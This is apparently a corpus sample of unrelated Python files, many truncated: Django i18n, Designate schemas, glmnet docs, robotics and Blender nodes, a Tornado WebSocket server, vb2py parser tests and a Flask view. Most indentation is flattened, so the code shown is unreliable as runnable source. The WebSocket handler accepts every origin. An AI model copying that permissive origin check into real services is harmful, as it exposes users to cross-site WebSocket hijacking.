if sys.version_info < (2, 4):
klass = DjangoTranslation23
globalpath = os.path.join(os.path.dirname(sys.modules[settings.__module__].__file__), 'locale')
if settings.SETTINGS_MODULE is not None:
parts = settings.SETTINGS_MODULE.split('.')
project = import_module(parts[0])
projectpath = os.path.join(os.path.dirname(project.__file__), 'locale')
else:
projectpath = None
def _fetch(lang, fallback=None):
global _translations
loc = to_locale(lang)
res = _translations.get(lang, None)
if res is not None:
return res
def _translation(path):
try:
t = gettext_module.translation('django', path, [loc], klass)
t.set_language(lang)
return t
except IOError, e:
return None
res = _translation(globalpath)
# We want to ensure that, for example, "en-gb" and "en-us" don't share
# the same translation object (thus, merging en-us with a local update
# doesn't affect en-gb), even though they will both use the core "en"
# translation. So we have to subvert Python's internal gettext caching.
base_lang = lambda x: x.split('-', 1)[0]
if base_lang(lang) in [base_lang(trans) for trans in _translations]:
res._info = res._info.copy()
res._catalog = res._catalog.copy()
def _merge(path):
t = _translation(path)
if t is not None:
if res is None:
return t
else:
res.merge(t)
return res
for localepath in settings.LOCALE_PATHS:
if os.path.isdir(localepath):
res = _merge(localepath)
if projectpath and os.path.isdir(projectpath):
res = _merge(projectpath)
for appname in settings.INSTALLED_APPS:
app = import_module(appname)
apppath = os.path.join(os.path.dirname(app.__file__), 'locale')
if os.path.isdir(apppath):
res = _merge(apppath)
if res is None:
if fallback is not None:
                res = fallback
else:
return gettext_module.NullTranslations()
_translations[lang] = res
return res
default_translation = _fetch(settings.LANGUAGE_CODE)
current_translation = _fetch(language, fallback=default_translation)
return current_translation
def activate(language):
"""
Fetches the translation object for a given tuple of application name and
language and installs it as the current translation object for the current
thread.
"""
_active[currentThread()] = translation(language)
def deactivate():
"""
Deinstalls the currently active translation object so that further _ calls
will resolve against the default translation object, again.
"""
global _active
if currentThread() in _active:
del _active[currentThread()]
def deactivate_all():
"""
Makes the active translation object a NullTranslations() instance. This is
useful when we want delayed translations to appear as the original string
for some reason.
"""
_active[currentThread()] = gettext_module.NullTranslations()
def get_language():
"""Returns the currently selected language."""
t = _active.get(currentThread(), None)
if t is not None:
try:
return to_language(t.language())
except AttributeError:
pass
# If we don't have a real translation object, assume it's the default language.
from django.conf import settings
return settings.LANGUAGE_CODE
def get_language_bidi():
"""
Returns selected language's BiDi layout.
False = left-to-right l
finiteloopsoftware/django-compressor | compress/utils.py | Python | bsd-3-clause | 69 | 0
def get_file_extension(filename):
return filename.split(".")[-1]
openstack/designate | designate/schema/__init__.py | Python | apache-2.0 | 3,897 | 0
# Copyright 2012 Managed I.T.
#
# Author: Kiall Mac Innes <kiall@managedit.ie>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from designate import exceptions
from designate.schema import format
from designate.schema import resolvers
from designate.schema import validators
from designate import utils
LOG = logging.getLogger(__name__)
class Schema(object):
def __init__(self, version, name):
self.raw_schema = utils.load_schema(version, name)
self.resolver = resolvers.LocalResolver.from_schema(
version, self.raw_schema)
if version in ['v2', 'admin']:
self.validator = validators.Draft4Validator(
self.raw_schema, resolver=self.resolver,
format_checker=format.draft4_format_checker)
else:
raise Exception('Unknown API version: %s' % version)
@property
def schema(self):
return self.validator.schema
@property
def properties(self):
return self.schema['properties']
@property
def links(self):
return self.schema['links']
@property
def raw(self):
return self.raw_schema
def validate(self, obj):
LOG.debug('Validating values: %r' % obj)
errors = []
for error in self.validator.iter_errors(obj):
errors.append({
'path': ".".join([str(x) for x in error.path]),
'message': error.message,
'validator': error.validator
})
if len(errors) > 0:
LOG.debug('Errors in validation: %r' % errors)
raise exceptions.InvalidObject("Provided object does not match "
"schema", errors=errors)
def filter(self, instance, properties=None):
if not properties:
properties = self.properties
filtered = {}
for name, subschema in list(properties.items()):
if 'type' in subschema and subschema['type'] == 'array':
subinstance = instance.get(name, None)
                filtered[name] = self._filter_array(subinstance, subschema)
elif 'type' in subschema and subschema['type'] == 'object':
subinstance = instance.get(name, None)
properties = subschema['properties']
filtered[name] = self.filter(subinstance, properties)
else:
filtered[name] = instance.get(name, None)
return filtered
def _filter_array(self, instance, schema):
if 'items' in schema and isinstance(schema['items'], list):
# NOTE(kiall): We currently don't make use of this..
raise NotImplementedError()
elif 'items' in schema:
schema = schema['items']
if '$ref' in schema:
with self.resolver.resolving(schema['$ref']) as ischema:
schema = ischema
properties = schema['properties']
return [self.filter(i, properties) for i in instance]
elif 'properties' in schema:
schema = schema['properties']
with self.resolver.resolving(schema['$ref']) as ischema:
schema = ischema
return [self.filter(i, schema) for i in instance]
else:
raise NotImplementedError('Can\'t filter unknown array type')
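# For illustration only: typical use is to load a named schema and validate a
# request body before filtering it (the schema name 'zone' below is a
# hypothetical example, not taken from this module).
#
#   schema = Schema('v2', 'zone')
#   schema.validate(body)       # raises exceptions.InvalidObject on failure
#   cleaned = schema.filter(body)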
hanfang/glmnet_python | glmnet_python/cvglmnet.py | Python | gpl-2.0 | 14,450 | 0.010242
# -*- coding: utf-8 -*-
"""
--------------------------------------------------------------------------
cvglmnet.m: cross-validation for glmnet
--------------------------------------------------------------------------
DESCRIPTION:
Does k-fold cross-validation for glmnet, produces a plot, and returns
a value for lambdau. Cross-validation is not implemented for Cox model yet.
USAGE:
Note that like glmnet, all arguments are keyword-only:
CVerr = cvglmnet(x, y, family, options, type, nfolds, foldid,
parallel, keep, grouped);
Fewer input arguments(more often) are allowed in the call. Default values
for the arguments are used unless specified by the user.
=======================
INPUT ARGUMENTS
x nobs x nvar scipy 2D array of x parameters (as in glmnet).
y nobs x nc scipy Response y as in glmnet.
family Response type as family in glmnet.
options Options as in glmnet.
ptype loss to use for cross-validation. Currently five options, not
all available for all models. The default is ptype='deviance', which uses
squared-error for Gaussian models (a.k.a ptype='mse' there), deviance for
logistic and Poisson regression, and partial-likelihood for the Cox
model (Note that CV for cox model is not implemented yet).
ptype='class' applies to binomial and multinomial logistic
regression only, and gives misclassification error. ptype='auc' is for
two-class logistic regression only, and gives area under the ROC curve.
ptype='mse' or ptype='mae' (mean absolute error) can be used by all models
except the 'cox'; they measure the deviation from the fitted mean to the
response.
nfolds number of folds - default is 10. Although nfolds can be as
large as the sample size (leave-one-out CV), it is not recommended for
large datasets. Smallest value allowable is nfolds=3.
foldid an optional vector of values between 1 and nfold identifying
what fold each observation is in. If supplied, nfold can be
missing.
parallel If True, use parallel computation to fit each fold.
keep If keep=True, a prevalidated array is returned containing
fitted values for each observation and each value of lambda.
This means these fits are computed with this observation and
the rest of its fold omitted. The foldid vector is also
returned. Default is keep=False.
grouped This is an experimental argument, with default true, and can
be ignored by most users. For all models except the 'cox',
this refers to computing nfolds separate statistics, and then
using their mean and estimated standard error to describe the
CV curve. If grouped=false, an error matrix is built up at
the observation level from the predictions from the nfold
fits, and then summarized (does not apply to
type='auc'). For the 'cox' family, grouped=true obtains the
CV partial likelihood for the Kth fold by subtraction; by
subtracting the log partial likelihood evaluated on the full
dataset from that evaluated on the on the (K-1)/K dataset.
This makes more efficient use of risk sets. With
grouped=FALSE the log partial likelihood is computed only on
the Kth fold.
=======================
OUTPUT ARGUMENTS:
A dict() is returned with the following fields.
lambdau the values of lambda used in the fits.
cvm the mean cross-validated error - a vector of length
length(lambdau).
cvsd estimate of standard error of cvm.
cvup upper curve = cvm+cvsd.
cvlo lower curve = cvm-cvsd.
nzero number of non-zero coefficients at each lambda.
name a text string indicating type of measure (for plotting
purposes).
glmnet_fit a fitted glmnet object for the full data.
lambda_min value of lambda that gives minimum cvm.
lambda_1se largest value of lambda such that error is within 1 standard
error of the minimum.
class Type of regression - internal usage.
fit_preval if keep=true, this is the array of prevalidated fits. Some
entries can be NA, if that and subsequent values of lambda
are not reached for that fold.
foldid if keep=true, the fold assignments used.
DETAILS:
The function runs glmnet nfolds+1 times; the first to get the lambda
sequence, and then the remainder to compute the fit with each of the
folds omitted. The error is accumulated, and the average error and
standard deviation over the folds is computed. Note that cvglmnet
does NOT search for values for alpha. A specific value should be
supplied, else alpha=1 is assumed by default. If users would like to
cross-validate alpha as well, they should call cvglmnet with a
pre-computed vector foldid, and then use this same fold vector in
separate calls to cvglmnet with different values of alpha.
LICENSE: GPL-2
AUTHORS:
 Algorithm was designed by Jerome Friedman, Trevor Hastie and Rob Tibshirani
Fortran code was written by Jerome Friedman
 R wrapper (from which the MATLAB wrapper was adapted) was written by Trevor Hastie
The original MATLAB wrapper was written by Hui Jiang,
and is updated and maintained by Junyang Qian.
This Python wrapper (adapted from the Matlab and R wrappers) is written by Balakumar B.J.,
Department of Statistics, Stanford University, Stanford, California, USA.
 REFERENCES:
Friedman, J., Hastie, T. and Tibshirani, R. (2008) Regularization Paths for Generalized Linear Models via Coordinate Descent,
http://www.jstatsoft.org/v33/i01/
Journal of Statistical Software, Vol. 33(1), 1-22 Feb 2010
Simon, N., Friedman, J., Hastie, T., Tibshirani, R. (2011) Regularization Paths for Cox's Proportional Hazards Model via Coordinate Descent,
http://www.jstatsoft.org/v39/i05/
Journal of Statistical Software, Vol. 39(5) 1-13
Tibshirani, Robert., Bien, J., Friedman, J.,Hastie, T.,Simon, N.,Taylor, J. and Tibshirani, Ryan. (2010) Strong Rules for Discarding Predictors in Lasso-type Problems,
http://www-stat.stanford.edu/~tibs/ftp/strong.pdf
Stanford Statistics Technical Report
SEE ALSO:
cvglmnetPlot, cvglmnetCoef, cvglmnetPredict, and glmnet.
EXAMPLES:
# Gaussian
x = scipy.random.rand(100, 10)
y = scipy.random.rand(100, 1)
cvfit = cvglmnet(x = x, y = y)
cvglmnetPlot(cvfit)
print( cvglmnetCoef(cvfit) )
print( cvglmnetPredict(cvfit, x[0:5, :], 'lambda_min') )
cvfit1 = cvglmnet(x = x, y = y, ptype = 'mae')
cvglmnetPlot(cvfit1)
# Binomial
x = scipy.random.rand(100, 10)
y = scipy.random.rand(100,1)
y = (y > 0.5)*1.0
fit = cvglmnet(x = x, y = y, family = 'binomial', ptype = 'class')
cvglmnetPlot(fit)
# poisson
x = scipy.random.rand(100,10)
y = scipy.random.poisson(size = [100, 1])*1.0
cvfit = cvglmnet(x = x, y = y, family = 'poisson')
cvglmnetPlot(cvfit)
# Multivariate Gaussian:
x = scipy.random.rand(100, 10)
y = scipy.random.rand(100,3)
cvfit = cvglmnet(x = x, y = y, family = 'mgaussian')
cvglmnetPlot(cvfit)
# Multinomial
x = scipy.random.rand(100,10)
y = scipy.random.rand(100,1)
y[y < 0.3] = 1.0
y[y < 0.6] = 2.0
y[y < 1.0] = 3.0
cvfit = cvglmnet(x = x, y = y, family = 'multinomial')
cvglmnetPlot(cvfit)
#cox
Not implemented for cvglmnet.py
% Cox
n=1000;p=30;
nzc=p/3;
x=randn(n,p);
beta=randn(nzc,1);
fx=x(:,1:nzc)*beta/3;
hx=exp(fx);
ty=exprnd(1./hx,n,1);
tcens=binornd(1,0.3,n,1);
y=cat(2,ty,1-tcens);
foldid=randsample(10,n,true);
fit1_cv=cvglmnet(x,y,'cox',[],[],[],foldid);
cvglmnetPlot(fit1_cv);
% Parallel
WalkingMachine/sara_behaviors | sara_flexbe_behaviors/src/sara_flexbe_behaviors/init_sequence_sm.py | Python | bsd-3-clause | 2,331 | 0.023595
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###########################################################
# WARNING: Generated code! #
# ************************** #
# Manual changes may get lost if file is generated again. #
# Only code inside the [MANUAL] tags will be kept. #
###########################################################
from flexbe_core import Behavior, Autonomy, OperatableStateMachine, ConcurrencyContainer, PriorityContainer, Logger
from sara_flexbe_states.sara_set_head_angle import SaraSetHeadAngle
from sara_flexbe_states.run_trajectory import RunTrajectory
from sara_flexbe_states.set_gripper_state import SetGripperState
# Additional imports can be added inside the following tags
# [MANUAL_IMPORT]
# [/MANUAL_IMPORT]
'''
Created on Thu Jul 27 2017
@author: Redouane Laref Nicolas Nadeau
'''
class Init_SequenceSM(Behavior):
'''
Initialisation Sequence
'''
def __init__(self):
super(Init_SequenceSM, self).__init__()
self.name = 'Init_Sequence'
# parameters of this behavior
# references to used behaviors
# Additional initialization code can be added inside the following tags
# [MANUAL_INIT]
# [/MANUAL_INIT]
# Behavior comments:
def create(self):
# x:976 y:64, x:973 y:289
_state_machine = OperatableStateMachine(outcomes=['finished', 'failed'])
# Additional creation code can be added inside the following tags
# [MANUAL_CREATE]
# [/MANUAL_CREATE]
with _state_machine:
# x:42 y:72
OperatableStateMachine.add('INIT HEAD',
SaraSetHeadAngle(pitch=0.4, yaw=0),
transitions={'done': 'repos'},
autonomy={'done': Autonomy.Off})
# x:205 y:72
OperatableStateMachine.add('repos',
RunTrajectory(file="repos", duration=0),
transitions={'done': 'opengrip'},
autonomy={'done': Autonomy.Off})
# x:506 y:86
OperatableStateMachine.add('opengrip',
SetGripperState(width=0.1, effort=0),
transitions={'object': 'finished', 'no_object': 'finished'},
autonomy={'object': Autonomy.Off, 'no_object': Autonomy.Off},
remapping={'object_size': 'object_size'})
return _state_machine
# Private functions can be added inside the following tags
# [MANUAL_FUNC]
# [/MANUAL_FUNC]
h-mayorquin/g_node_data_analysis_205 | 1_day/fit_data.py | Python | bsd-2-clause | 1,957 | 0.001533
import numpy as np
import matplotlib.pyplot as plt
from math import exp
size = 9
dt = 50.0 # ms
dt_2 = 550.0
# Vectors to fit
x_fit = np.zeros(size)
V_max_fit = np.zeros(size)
V0_fit = np.zeros(size)
# Parameters of the model
tau_rec = 1000.0 # ms
tau_mem = 32.0 # ms
tau_in = 1.8 # ms
A = 144.0
u = 0.26
# First we will fit x
x_fit[0] = 1
for i in range(size - 2):
    # keep the recovery term in the same statement (the original continuation was a no-op line)
    x_fit[i+1] = (x_fit[i] * (1 - u) * exp(-dt / tau_rec)
                  + 1 - exp(-dt / tau_rec))
# Last value of x_fit
x_fit[-1] = (x_fit[-2] * (1 - u) * exp(-dt_2 / tau_rec)
             + 1 - exp(-dt_2 / tau_rec))
# We calculate alpha fit
alpha_fit = u * A * x_fit
# Now we calculate V_0 and V_max
V0_fit[0] = 0
tau_diff = tau_in - tau_mem
for k in range(size - 1):
ex1 = exp(-dt / tau_in)
ex2 = exp(-dt / tau_mem)
print 'ex1 ex2', ex1, ex2
problem = ex1 - ex2
print 'problem', problem
this = alpha_fit[k] * tau_in / tau_diff
print 'this', this
that = V0_fit[k] * exp(-dt / tau_mem)
print 'that', that
V0_fit[k + 1] = that + this * problem
for k in range(size - 1):
aux2 = (alpha_fit[k] * tau_in - V0_fit[k] * tau_diff)
#print 'aux', aux2
    aux = alpha_fit[k] * tau_mem / aux2  # use the current loop index k, not the stale i from the loop above
V_max_fit[k] = alpha_fit[k] * (aux ** (tau_mem / tau_diff))
# The final values
ex1 = np.exp(-dt_2 / tau_in)
ex2 = np.exp(-dt_2 / tau_mem)
print 'ex1 ex2', ex1, ex2
problem = ex1 - ex2
problem = ex1 - ex2
this = alpha_fit[-2] * tau_in / tau_diff
that = V0_fit[-2] * exp(-dt_2 / tau_mem)
V0_fit[-1] = that + this * problem
aux = alpha_fit[-1] * tau_mem / (alpha_fit[-1]
* tau_in - V0_fit[-1] * tau_diff)
V_max_fit[-1] = alpha_fit[-1] * (aux ** (tau_mem / tau_diff))
amp_fit = V_max_fit - V0_fit
# Finally we plot
plt.subplot(1, 2, 1)
plt.plot(x_fit, '*-', label='x_fit')
plt.legend()
plt.subplot(1, 2, 2)
plt.plot(V_max_fit, '*-', label='Vmax_fit')
plt.hold(True)
plt.plot(V0_fit, '*-', label='V0_fit')
plt.legend()
plt.show()
mrozekma/Sprint | WebSocket.py | Python | mit | 3,192 | 0.030075
try:
from tornado.websocket import WebSocketHandler
import tornado.ioloop
tornadoAvailable = True
except ImportError:
class WebSocketHandler(object): pass
tornadoAvailable = False
from json import loads as fromJS, dumps as toJS
from threading import Thread
from Log import console
import Settings
from utils import *
PORT = Settings.PORT + 1
handlers = []
channels = {}
class WebSocket:
@staticmethod
def available():
return tornadoAvailable
@staticmethod
def start():
if WebSocket.available():
WSThread().start()
@staticmethod
def broadcast(data):
for handler in handlers:
handler.write_message(toJS(data))
@staticmethod
def sendChannel(channel, data):
if not 'channel' in data:
data['channel'] = channel
for handler in channels.get(channel, []):
handler.write_message(toJS(data))
class WSThread(Thread):
def __init__(self):
Thread.__init__(self)
self.name = 'websocket'
self.daemon = True
def run(self):
app = tornado.web.Application([('/', WSHandler)])
app.listen(PORT, '0.0.0.0')
tornado.ioloop.IOLoop.instance().start()
class WSHandler(WebSocketHandler):
def __init__(self, *args, **kw):
super(WSHandler, self).__init__(*args, **kw)
self.channels = set()
def check_origin(self, origin):
return True
def open(self):
handlers.append(self)
console('websocket', "Opened")
def on_message(self, message):
console('websocket', "Message received: %s" % message)
try:
data = fromJS(message)
except:
return
if 'subscribe' in data and isinstance(data['subscribe'], list):
addChannels = (set(data['subscribe']) - self.channels)
self.channels |= addChannels
for channel in addChannels:
if channel not in channels:
channels[channel] = set()
channels[channel].add(self)
if 'unsubscribe' in data and isinstance(data['unsubscribe'], list):
rmChannels = (self.channels & set(data['unsubscribe']))
self.channels -= rmChannels
for channel in rmChannels:
channels[channel].remove(self)
if len(channels[channel]) == 0:
del channels[channel]
def on_close(self):
for channel in self.channels:
channels[channel].remove(self)
if len(channels[channel]) == 0:
del channels[channel]
handlers.remove(self)
console('websocket', "Closed")
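# The messages handled above are plain JSON. For illustration, a client could
# join and later leave a sprint's backlog channel (the id 7 is hypothetical):
#
#   {"subscribe": ["backlog#7"]}
#   {"unsubscribe": ["backlog#7"]}
#
# Anything pushed with WebSocket.sendChannel() is then delivered to that
# client tagged with the channel name in its 'channel' field.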
verbs = {
'status': "Status set",
'name': "Renamed",
'goal': "Goal set",
'assigned': "Reassigned",
'hours': "Hours updated",
}
from Event import EventHandler, addEventHandler
class ShareTaskChanges(EventHandler):
def newTask(self, handler, task):
WebSocket.sendChannel("backlog#%d" % task.sprint.id, {'type': 'new'}); #TODO
def taskUpdate(self, handler, task, field, value):
if field == 'assigned': # Convert set of Users to list of usernames
value = [user.username for user in value]
elif field == 'goal': # Convert Goal to goal ID
			value = value.id if value else 0
description = ("%s by %s" % (verbs[field], task.creator)) if field in verbs else None
		WebSocket.sendChannel("backlog#%d" % task.sprint.id, {'type': 'update', 'id': task.id, 'revision': task.revision, 'field': field, 'value': value, 'description': description, 'creator': task.creator.username})
addEventHandler(ShareTaskChanges())
reingart/vb2py | vb2py/test/testparser.py | Python | gpl-3.0 | 41,055 | 0.003898
#
# Turn off logging in extensions (too loud!)
import vb2py.extensions
vb2py.extensions.disableLogging()
from vb2py.vbparser import buildParseTree, VBParserError
#
# Set some config options which are appropriate for testing
import vb2py.config
Config = vb2py.config.VB2PYConfig()
Config.setLocalOveride("General", "ReportPartialConversion", "No")
tests = []
# << Parsing tests >> (1 of 61)
# Simple assignments
tests.append("""
a = 10
b = 20+30
c = "hello there"
oneVal = 10
twoVals = Array(10,20)
functioncall = myfunction.mymethod(10)
""")
# Set type assignments
tests.append("""
Set a = myobject
Set b = myobject.subobject
Set obj = function(10, 20, 30+40)
""")
# Set type assignments with "New" objects
tests.append("""
Set a = New myobject
Set b = New myobject.subobject
""")
# Assignments with tough parenthesis
tests.extend([
"d=(((4*5)/2+10)-10)",
])
# Assignments with tough string quotes
tests.extend([
'd="g""h""j"""',
])
# Assignments with tough strings in general
tests.extend([
r'a="\"', # The single slash is a killer
])
# << Parsing tests >> (2 of 61)
# Simple expressions
tests.extend([
'a = 10',
'a = 20+30',
'a = "hello there"',
'a = 10',
'a = Array(10,20)',
'a = myfunction.mymethod(10)',
'a = &HFF',
'a = &HFF&',
'a = #1/10/2000#',
'a = #1/10#',
'a = 10 Mod 2',
])
# Nested expressions
tests.extend(["a = 10+(10+(20+(30+40)))",
              "a = (10+20)+(30+40)",
"a = ((10+20)+(30+40))",
])
# Conditional expressions
tests.extend(["a = a = 1",
              "a = a <> 10",
              "a = a > 10",
              "a = a < 10",
              "a = a <= 10",
              "a = a >= 10",
              "a = a = 1 And b = 2",
              "a = a = 1 Or b = 2",
              "a = a Or b",
              "a = a Or Not b",
"a = Not a = 1",
"a = Not a",
"a = a Xor b",
"a = b Is Nothing",
"a = b \ 2",
"a = b Like c",
'a = "hello" Like "goodbye"',
])
# Things that failed
tests.extend([
"a = -(x*x)",
"a = -x*10",
"a = 10 Mod 6",
"Set NewEnum = mCol.[_NewEnum]",
"a = 10 ^ -bob",
])
# Functions
tests.extend([
"a = myfunction",
"a = myfunction()",
"a = myfunction(1,2,3,4)",
"a = myfunction(1,2,3,z:=4)",
"a = myfunction(x:=1,y:=2,z:=4)",
"a = myfunction(b(10))",
"a = myfunction(b _\n(10))",
])
# String Functions
tests.extend([
'a = Trim$("hello")',
'a = Left$("hello", 4)',
])
# Things that failed
tests.extend([
"a = -(x*x)",
"a = -x*10",
"a = 10 Mod 6",
])
# Address of
tests.extend([
"a = fn(AddressOf fn)",
"a = fn(a, b, c, AddressOf fn)",
"a = fn(a, AddressOf b, AddressOf c, AddressOf fn)",
"a = fn(a, AddressOf b.m.m, AddressOf c.k.l, AddressOf fn)",
])
# Type of
tests.extend([
"a = fn(TypeOf fn)",
"a = fn(a, b, c, TypeOf fn)",
"a = fn(a, TypeOf b, TypeOf c, TypeOf fn)",
"a = fn(a, TypeOf b.m.m, TypeOf c.k.l, TypeOf fn)",
"a = TypeOf Control Is This",
"a = TypeOf Control Is This Or TypeOf Control Is That",])
# << Parsing tests >> (3 of 61)
# Using ByVal and ByRef in a call or expression
tests.extend([
'a = fn(ByVal b)',
'a = fn(x, y, z, ByVal b)',
'a = fn(x, y, z, ByVal b, 10, 20, 30)',
'a = fn(ByVal a, ByVal b, ByVal c)',
'a = fn(ByRef b)',
'a = fn(x, y, z, ByRef b)',
'a = fn(x, y, z, ByRef b, 10, 20, 30)',
'a = fn(ByRef a, ByRef b, ByRef c)',
'fn ByVal b',
'fn x, y, z, ByVal b',
'fn x, y, z, ByVal b, 10, 20, 30',
'fn ByVal a, ByVal b, ByVal c',
'fn ByRef b',
'fn x, y, z, ByRef b',
'fn x, y, z, ByRef b, 10, 20, 30',
'fn ByRef a, ByRef b, ByRef c',
])
# << Parsing tests >> (4 of 61)
# One line comments
tests.append("""
a = 10
' b = 20+30
' c = "hello there"
' oneVal = 10
twoVals = Array(10,20)
' functioncall = myfunction.mymethod(10)
""")
# One line comments with Rem
tests.append("""
a = 10
Rem b = 20+30
Rem not needed c = "hello there"
Rem opps oneVal = 10
twoVals = Array(10,20)
Rem dont do this anymore functioncall = myfunction.mymethod(10)
""")
# In-line comments
tests.append("""
a = 10
b = 20+30 ' comment
c = "hello there" ' another comment
oneVal = 10 ' yet another comment
twoVals = Array(10,20)
functioncall = myfunction.mymethod(10)
""")
# In-line comments with Rem
tests.append("""
a = 10
b = 20+30 Rem comment
c = "hello there" Rem another comment
oneVal = 10 Rem yet another comment
twoVals = Array(10,20)
functioncall = myfunction.mymethod(10)
""")
# Things which aren't comments
tests.append("""
a = "hello, this might ' look like ' a comment ' "
b = "wow there are a lot of '''''''' these here"
""")
# tough inline comments
tests.extend([
"Public a As Integer ' and a comment"
])
# comments in awkward places
tests.extend([
"""
If a =0 Then ' nasty comment
b=1
End If ' other nasty comment
""",
"""
While a<0 ' nasty comment
b=1
Wend ' other nasty comment
""",
"""
Select Case a ' nasty comment
Case 10 ' oops
b=1
Case Else ' other nasty comment
b = 2
End Select ' gotcha
""",
"""
For i = 0 To 100 ' nasty comment
b=1
Next i ' other nasty comment
""",
"""
Sub a() ' nasty comment
b=1
End Sub ' other nasty comment
""",
"""
Function f() ' nasty comment
b=1
End Function ' other nasty comment
""",
])
# << Parsing tests >> (5 of 61)
# Directives
tests.extend([
"' VB2PY-Set General.Blah = Yes",
"' VB2PY-Set General.Blah = ___",
"' VB2PY-Unset General.Blah",
"' VB2PY-Add: General.Option = 10",
])
# << Parsing tests >> (6 of 61)
# Two line continuations
tests.append("""
a = _
10 + 20 + 30
b = 10/ _
25
c = (one + _
two + three)
""")
# Multi-line continuations
tests.append("""
a = _
10 + 20 + 30 _
* 10/ _
25
c = (one + _
two + three) * _
four.five()
""")
tests.extend(["""
Private Declare Function GetTempPathA Lib "kernel32" _
(ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
""",
"""
Function GetTempPathA _
(ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
End Function
""",
])
# << Parsing tests >> (7 of 61)
# Simple dims
tests.extend([
"Dim A",
"Dim B As String",
"Dim variable As Object.OtherObj",
"Dim Var As Variant",
"Dim A As String * 100",
])
# Dims with New
tests.extend([
"Dim A As New Object",
"Dim B As New Collection",
])
# Multiple dims on one line
tests.extend([
"Dim A, B, C, D, E, F",
"Dim B As String, B As Long, B As Integer, B As String, B As String",
"Dim variable As Object.OtherObj, B, C, D, E",
"Dim Var As Variant",
"Dim A, B, C As New Collection",
"Dim E As New Collection, F As New Object, F, G",
"Dim H As New Object, G As New Object",
])
# Array type dims
tests.extend([
"Dim A()",
"Dim B(10, 20, 30) As String",
"Dim variable() As Object.OtherObj",
"Dim Var(mysize) As Variant",
])
# Scoped dims
tests.extend([
"Public A",
"Private B As String",
"Private A, B, C, D, E, F",
"Private B As String, B As Long, B As Integer, B As String, B As String",
"Private variable As Object.OtherObj, B, C, D, E",
"Public Var As Variant",
])
# Static dims
tests.extend([
"Static A",
"Static B As String",
"Static A, B, C, D, E, F",
"Static B As String, B As Long, B As Integer, B As String, B As String",
"Static variable As Object.OtherObj, B, C, D, E",
"Static Var As Variant",
])
# << Parsing tests >> (8 of 61)
# Arrays
tests.extend([
"Dim a(10)",
"Dim a(0)",
"Dim a(0), b(20), c(30)",
"Dim a(10+20)",
"Dim a(10+20, 1+3)",
"Dim a(1 To 10)",
"Dim a(1 To 10, 5 To 20)",
])
# Redims
tests.extend([
"ReDim a(10)",
"ReDim a(0)",
"ReDim Preserve a(20)",
"ReDim a(0), b(20), c(30)",
"ReDim Preserve a(20), b(20)",
"ReDim a(10+20)",
"ReDim a(10+20, 1+3)",
"ReDim a(1 To 10)",
"ReDim a(1 To 10, 5 To 20)",
"ReDim
taxpon/sverchok | old_nodes/matrix_in.py | Python | gpl-3.0 | 2,720 | 0.003309
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
#  Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
import bpy
import mathutils
from sverchok.node_tree import SverchCustomTreeNode
from sverchok.data_structure import (matrixdef, Matrix_listing, Vector_generate)
class MatrixGenNode(bpy.types.Node, SverchCustomTreeNode):
''' MatrixGenerator '''
bl_idname = 'MatrixGenNode'
    bl_label = 'Matrix in'
bl_icon = 'OUTLINER_OB_EMPTY'
def sv_init(self, context):
s = self.inputs.new('VerticesSocket', "Location")
s.use_prop = True
s = self.inputs.new('VerticesSocket', "Scale")
s.use_prop = True
s.prop = (1, 1 , 1)
s = self.inputs.new('VerticesSocket', "Rotation")
s.use_prop = True
s.prop = (0, 0, 1)
self.inputs.new('StringsSocket', "Angle")
self.outputs.new('MatrixSocket', "Matrix")
def process(self):
L,S,R,A = self.inputs
Ma = self.outputs[0]
if not Ma.is_linked:
return
loc = Vector_generate(L.sv_get())
scale = Vector_generate(S.sv_get())
rot = Vector_generate(R.sv_get())
rotA, angle = [[]], [[0.0]]
# ability to add vector & vector difference instead of only rotation values
if A.is_linked:
if A.links[0].from_socket.bl_idname == 'VerticesSocket':
rotA = Vector_generate(A.sv_get())
angle = [[]]
else:
angle = A.sv_get()
rotA = [[]]
max_l = max(len(loc[0]), len(scale[0]), len(rot[0]), len(angle[0]), len(rotA[0]))
orig = []
for l in range(max_l):
M = mathutils.Matrix()
orig.append(M)
matrixes_ = matrixdef(orig, loc, scale, rot, angle, rotA)
matrixes = Matrix_listing(matrixes_)
Ma.sv_set(matrixes)
def register():
bpy.utils.register_class(MatrixGenNode)
def unregister():
bpy.utils.unregister_class(MatrixGenNode)
if __name__ == '__main__':
register()
|
PennyDreadfulMTG/Penny-Dreadful-Discord-Bot
|
logsite/views/match_view.py
|
Python
|
gpl-3.0
| 2,353
| 0.002125
|
import html
import inflect
import titlecase
from flask import url_for
from shared.pd_exception import DoesNotExistException
from .. import APP, importing
from ..data import match
from ..view import View
@APP.route('/match/<int:match_id>/')
def show_match(match_id: int) -> str:
view = Match(match.get_match(match_id))
return view.page()
# pylint: disable=no-self-use,too-many-instance-attributes
class Match(View):
def __init__(self, viewed_match: match.Match) -> None:
super().__init__()
if not viewed_match:
raise DoesNotExistException()
self.match = viewed_match
self.id = viewed_match.id
self.comment = viewed_match.comment
self.format_name = viewed_match.format_name()
self.players_string = ' vs '.join([p.name for p in viewed_match.players])
self.players_string_safe = ' vs '.join([player_link(p.name) for p in viewed_match.players])
self.module_string = ', '.join([m.name for m in viewed_match.modules])
if not viewed_match.games:
self.no_games = True
return
self.game_one = viewed_match.games[0]
self.has_game_two = False
self.has_game_three = False
if len(viewed_match.games) > 1:
self.has_game_two = True
self.game_two = viewed_match.games[1]
if len(viewed_match.games) > 2:
self.has_game_three = True
